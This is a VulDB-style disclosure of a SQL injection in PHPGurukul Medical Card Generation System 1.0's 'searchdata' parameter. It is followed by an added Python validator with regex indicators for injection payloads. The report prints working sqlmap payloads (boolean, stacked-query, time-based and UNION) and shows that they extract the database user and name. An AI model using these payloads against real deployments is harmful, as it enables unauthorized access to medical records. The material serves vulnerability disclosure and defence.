| Title | PHPGurukul Medical Card Generation System - searchdata Parameter V1.0 SQL Injection |
|---|
| Description | I would like to report a SQL injection vulnerability I discovered in the PHPGurukul of the Medical Card Generation System during my testing.
Details:
Affected URL/Endpoint: /mcgs/admin/search-medicalcard.php
Vulnerable Parameter: 'searchdata'
Risk Level: High (allows malicious users to execute arbitrary SQL queries)
Steps to reproduce:
1) Sign in as admin.
2) Navigate to Search and input a reference number for example: '687246123'
3) Use a proxy like Burp Suite to intercept the request.
4) Input the payload to invoke the SQL injection.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: searchdata (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: searchdata=687246123' AND 7281=7281-- WNmw&search=
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: searchdata=687246123';SELECT SLEEP(5)#&search=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: searchdata=687246123' AND (SELECT 8201 FROM (SELECT(SLEEP(5)))cTpy)-- Ffmf&search=
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: searchdata=687246123' UNION ALL SELECT NULL,CONCAT(0x716b6b7071,0x587271596244774d534461554d45544e726c586d4c50674e744779635a6f706c6f7a5a4f6e6d4b6f,0x716a7a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&search=
---
[11:04:04] [INFO] the back-end DBMS is MySQL
[11:04:04] [INFO] fetching banner
web application technology: PHP 8.2.18, Apache 2.4.59
back-end DBMS: MySQL >= 5.0.12
banner: '8.3.0'
[11:04:04] [INFO] fetching current user
current user: 'root@localhost'
[11:04:04] [INFO] fetching current database
current database: 'mgsdb'
Please let me know if you need further information or a more detailed analysis. |
|---|
| User | Delvy (UID 74555) |
|---|
| Submission | 21/10/2024 05:06 (2 years ago) |
|---|
| Moderation | 23/10/2024 13:05 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 281568 [PHPGurukul Medical Card Generation System 1.0 Search search-medicalcard.php searchdata SQL injection] |
|---|
| Points | 17 |
|---|
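
A defender-side check for the `searchdata` field described in the submission above, as an added example that is not part of the original report or of the PHPGurukul code: it validates the POST field against an allow-list and labels which of the reported payload classes a rejected value resembles. The digits-only reference format, the function names and the sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlencode

# Assumption: a legitimate reference number is digits only, like the
# report's example value 687246123.
REFERENCE_RE = re.compile(r"\d{1,20}")

# Indicators drawn from the payload classes in the sqlmap output above.
INDICATORS = {
    "quote-breakout": re.compile(r"'"),
    "comment-terminator": re.compile(r"--\s|#"),
    "stacked-query": re.compile(r";\s*\w"),
    "time-delay": re.compile(r"\bSLEEP\s*\(", re.I),
    "union-select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "boolean-tautology": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
}

def inspect_body(body: str) -> dict:
    """Decode a urlencoded POST body and assess its searchdata field."""
    values = parse_qs(body, keep_blank_values=True).get("searchdata", [""])
    value = values[0]
    # Reject duplicated parameters as well as anything that is not digits.
    valid = len(values) == 1 and REFERENCE_RE.fullmatch(value) is not None
    hits = sorted(n for n, rx in INDICATORS.items() if rx.search(value))
    return {"valid": valid, "indicators": hits}

def triage(bodies):
    """Return (body, result) pairs for requests that fail validation."""
    results = ((b, inspect_body(b)) for b in bodies)
    return [(b, r) for b, r in results if not r["valid"]]

# Constructed sample bodies: one benign search plus payloads from the report
# (the UNION payload is shortened here).
SAMPLES = [urlencode({"searchdata": v, "search": ""}) for v in (
    "687246123",
    "687246123' AND 7281=7281-- WNmw",
    "687246123';SELECT SLEEP(5)#",
    "687246123' UNION ALL SELECT NULL,NULL-- -",
)]

if __name__ == "__main__":
    for body, result in triage(SAMPLES):
        print(result["indicators"], body)
```

The allow-list decides whether a request is rejected; the indicator labels only help an analyst sort rejected requests and are not a substitute for parameterized queries in the application itself.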